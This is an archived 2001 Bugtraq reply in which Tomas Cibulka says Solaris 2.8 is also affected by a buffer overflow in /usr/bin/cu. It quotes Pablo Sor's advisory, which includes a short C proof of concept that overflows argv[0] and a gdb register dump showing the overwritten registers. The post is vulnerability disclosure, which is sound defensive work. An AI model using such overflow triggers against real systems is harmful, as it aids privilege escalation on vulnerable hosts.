[18700] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Tomas Cibulka)
Thu Jan 18 18:36:58 2001
Mail-Followup-To: Tomas Cibulka <shock@hq.alert.sk>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20010118201910.A28768@hq.alert.sk>
Date: Thu, 18 Jan 2001 20:19:10 +0100
Reply-To: Tomas Cibulka <shock@HQ.ALERT.SK>
From: Tomas Cibulka <shock@HQ.ALERT.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3A65F3DC.74ABDB17@afip.gov.ar>; from psor@AFIP.GOV.AR on Wed,
Jan 17, 2001 at 04:34:52PM -0300
HI
solaris 2.8 seems to be also affected by this bug.
But U can gain only uucp rights in default instalation.
bye
On Wed, Jan 17, 2001 at 04:34:52PM -0300, Pablo Sor wrote:
> Description
>
> The /usr/bin/cu command contains a buffer overflow, the problem occurs
> when
> it copy his own name ( argv[0] ) to an internal variable without
> checking
> out its lenght and this causes the overflow.
>
> Vulnerable Versions
>
> Sun Solaris 2.4
> Sun Solaris 2.5
> Sun Solaris 2.5.1
> Sun Solaris 2.6
> Sun Solaris 2.7
>
> (Dont know about Solaris 2.8)
>
> Technical Description
>
> #include <stdio.h>
>
> void main(int argc,char **argv)
> {
> char *buf;
>
> buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> memset(buf,0x41,atoi(argv[1])-1);
> buf[atoi(argv[1])-1]=0;
> execl("/usr/bin/cu",buf,(char *)0);
> }
>
> $ uname -a
> SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5
>
> $ ./cu-demo 4000
> Segmentation Fault (core dumped)
>
> $ gdb ./cu-demo --core=core
>
> GNU gdb 4.17
> Copyright 1998 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "sparc-sun-solaris2.5.1"...
> warning: core file may not match specified executable file.
> Core was generated by
> `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAA'.
> Program terminated with signal 11, Segmentation Fault.
> #0 0xef62901c in ?? ()
> (gdb) info registers
> g0 0x0 0
> g1 0xef628d24 -278754012
> g2 0x0 0
> g3 0x0 0
> g4 0x0 0
> g5 0x0 0
> g6 0x0 0
> g7 0x0 0
> o0 0x137a4 79780
> o1 0xef792a88 -277271928
> o2 0x0 0
> o3 0x0 0
> o4 0x0 0
> o5 0xef792a88 -277271928
> sp 0xefffecb0 -268440400
> o7 0x31b48 203592
> l0 0x7efefeff 2130640639
> l1 0x81010100 -2130640640
> l2 0xff000000 -16777216
> l3 0xff0000 16711680
> l4 0xff00 65280
> l5 0x81010100 -2130640640
> l6 0x7 7
> l7 0xef7927d4 -277272620
> i0 0x39000 233472
> i1 0xeffffec4 -268435772
> i2 0x38088 229512
> i3 0x41414141 1094795585
> i4 0x2f 47
> i5 0x0 0
> fp 0xefffecf0 -268440336
> i7 0x137a4 79780
> y 0x0 0
> psr 0x4400086 71303302
> wim 0x0 0
> tbr 0x0 0
> pc 0xef62901c -278753252
> npc 0xef628ffc -278753284
> fpsr 0x0 0
> cpsr 0x0 0
>
>
> Pablo Sor
> psor@afip.gov.ar
--
------------------------------------------------------------------------
/| Tomas Cibulka
'o.O'
=(___)= E-MAIL : shock@alert.sk
U URL : hq.alert.sk/~shock -tott moja www page
PGP KEY : finger shock@hq.alert.sk
-----------------------------------------------------------------------
